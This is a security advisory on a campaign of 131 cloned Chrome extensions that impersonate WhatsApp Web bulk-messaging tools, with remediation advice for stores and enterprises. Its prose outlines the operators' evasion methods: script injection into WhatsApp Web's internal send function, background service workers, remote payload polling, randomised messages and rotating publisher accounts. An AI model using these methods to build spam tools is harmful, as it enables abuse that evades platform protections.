Analysis Summary

A widespread campaign of malicious Chrome extensions impersonating WhatsApp Web automation tools has been uncovered, with 131 fraudulent extensions identified on the Chrome Web Store. Though marketed as unique products, all of them share an identical core codebase. These extensions advertise features like bulk messaging, automated scheduling, message templates, and analytics dashboards, primarily targeting small businesses in Brazil, where WhatsApp is widely used for customer communication. Despite violating Chrome Web Store policies against duplicate functionality and unauthorized messaging, all 131 extensions remained publicly available as of mid-October 2025.

The extensions work by injecting custom JavaScript into the WhatsApp Web interface to automate message delivery without user consent. A core code snippet leverages WhatsApp's internal function (window.WPP.helpers.sendMessage) to send scheduled messages by attaching itself to the DOM during page load. Through this method, the extensions bypass WhatsApp’s built-in anti-spam controls and rate limits. Furthermore, the Chrome Manifest V3 service worker architecture is abused to run background operations, enabling bulk messaging and scheduling tasks even when the WhatsApp Web tab is inactive.

Researchers also discovered advanced dynamic control features that enhance these extensions’ adaptability and stealth. The service worker fetches remote configuration files from the operator's server, allowing real-time updates to messaging patterns, throttling delays, and content to evade spam detection systems. Another persistence method uses the periodicsync event to continuously poll servers for new JavaScript payloads. This enables extensions to reload updated, unflagged malicious scripts even if previous versions are detected or reported. Operators further evade detection by randomizing message content, tuning send intervals, and rotating publisher accounts.

Distribution is structured like a reseller franchise model to maximize reach and profits while hiding the core operator. Resellers pay a fee to access the tool, receive customized branding packages, and sell subscriptions, while the main operator maintains backend infrastructure and control over payload delivery. These extensions are promoted through glossy landing pages with false claims of privacy compliance and security audits, masking their non-compliance with platform policies. With thousands of active users and consistent rebranding efforts, this campaign represents a large-scale abuse of the Chrome Web Store ecosystem and highlights the urgent need for improved extension governance and greater user awareness.

Impact

• Gain Access

Indicators of Compromise

Remediation

• Strengthen Chrome Web Store review processes to detect duplicate codebases, hidden script injections, and unauthorized WhatsApp Web automation.
• Permanently ban developer accounts repeatedly uploading cloned or policy-violating extensions.
• Monitor and flag extensions abusing Manifest V3 features such as service workers and periodicsync for automated messaging.
• Detect and block extensions injecting scripts into WhatsApp Web or using internal APIs like WPP.helpers.sendMessage without consent.
• Restrict extensions from fetching remote configuration files or executing external payloads using importScripts().
• Enhance WhatsApp Web anti-automation controls to identify abnormal messaging volumes, timing anomalies, or non-human interaction patterns.
• Implement browser-side integrity checks to alert users when extensions interact with WhatsApp’s internal functions.
• Enforce enterprise-level extension whitelisting to limit installations to trusted and verified extensions only.